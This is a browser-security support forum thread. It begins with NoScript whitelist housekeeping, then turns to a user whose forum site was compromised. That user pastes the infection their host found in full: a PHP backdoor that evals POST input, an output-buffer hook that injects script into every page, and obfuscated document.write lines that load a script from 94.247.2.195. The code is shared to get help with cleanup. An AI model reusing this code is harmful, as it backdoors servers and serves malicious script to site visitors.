94.247.2.195

[informactive]

I did what you suggested and everything appears to be working OK.

Another question.

NoScript, options, white list.

Would it be a good idea or can't hurt to go through list every so often to remove sites I might never to back and visit?

And reason being just to clean up list a bit.

Or on sites I haven't been to in over say some predetermine time automatically deleted or text turns red.

thanks

[Alan Baxter]

Would it be a good idea or can't hurt to go through list every so often to remove sites I might never to back and visit?

It's not necessary but can't hurt. I do that occasionally during my OCD moments. Sometimes I accidentally remove a needed third-party helper site, but it's easily whitelisted again when its needed.

[informactive]

OK.

It would be nice of NoScript knew when I was going to have an OCD moment and do it for me with a single check box however I'll do in my OCD moments.

[GµårÐïåñ]

Well it seems like I missed all the action on this one, go figure, but it seems you resolved it and it was already suggested that you got injected. So good luck and now maybe I will get the followup posts.

[petricamoise]

I also have my forum infected http://wisebets.org .
I got some help from my hosting company, and they found the code in the following files:

Code: Select all

config.php:

<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCdPWFElM0NzSXB2Y3J6WUZpcHpZRnQlMjBzcjZ2R2MlM0QlMkYlMkY5NCUyRTI0ellGNyUyRW1zbzJJcHYlMkUxOTVuMyUyRk9YUWpJcHZxdWVyeSUyRWpzbXNvJTNFJTNDNnZHJTJGc0lwdmNyaXB0bGklM0UnKS5yZXBsYWNlKC9saXxhUXw2dkd8ellGfE9YUXxtc298RGZ8bjN8SXB2L2csIiIpKTsKIC0tPjwvc2NyaXB0Pg=='));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?><?php

index.php:

<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCdPWFElM0NzSXB2Y3J6WUZpcHpZRnQlMjBzcjZ2R2MlM0QlMkYlMkY5NCUyRTI0ellGNyUyRW1zbzJJcHYlMkUxOTVuMyUyRk9YUWpJcHZxdWVyeSUyRWpzbXNvJTNFJTNDNnZHJTJGc0lwdmNyaXB0bGklM0UnKS5yZXBsYWNlKC9saXxhUXw2dkd8ellGfE9YUXxtc298RGZ8bjN8SXB2L2csIiIpKTsKIC0tPjwvc2NyaXB0Pg=='));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?><?php

postinfo.html:

document.write(unescape('OXQ%3CsIpvcrzYFipzYFt%20sr6vGc%3D%2F%2F94%2E24zYF7%2Emso2Ipv%2E195n3%2FOXQjIpvquery%2Ejsmso%3E%3C6vG%2FsIpvcriptli%3E').replace(/li|aQ|6vG|zYF|OXQ|mso|Df|n3|Ipv/g,""));
_vti_inf.html:document.write(unescape('OXQ%3CsIpvcrzYFipzYFt%20sr6vGc%3D%2F%2F94%2E24zYF7%2Emso2Ipv%2E195n3%2FOXQjIpvquery%2Ejsmso%3E%3C6vG%2FsIpvcriptli%3E').replace(/li|aQ|6vG|zYF|OXQ|mso|Df|n3|Ipv/g,""));

Also I found the following code in almost all my files:

Code: Select all

<script language=javascript><!-- document.write(unescape('OXQ%3CsIpvcrzYFipzYFt%20sr6vGc%3D%2F%2F94%2E24zYF7%2Emso2Ipv%2E195n3%2FOXQjIpvquery%2Ejsmso%3E%3C6vG%2FsIpvcriptli%3E').replace(/li|aQ|6vG|zYF|OXQ|mso|Df|n3|Ipv/g,"")); -->

I removed it manually from all I could find, and now the forum is working fine except the posting part. When I try to post on the forum it`s getting slow and tries to connect to 94.247.2.195 (before I removed the code it was trying to connect to this IP from anypage) . But I already searched the code in ALL files (manually) and cound`t find it anymore, even if it`s still there.

Any ideas where it may be ?
Also, anyone has a suggestion of how to protect against it so that won`t happen again ?

Thanks in advance.

[therube]

Again. First you have to determine if it is your website or host that is (initially) being exploited.
The .php - who is responsible for that? You or your host. If you, fix it. If your hosting company, have them fix it.

noscript, 94.247.2.195 and malwarebytes

Has my website been hacked?

[GµårÐïåñ]

There might be an import reference to an external file, check all your imports and links in the documents to external JS.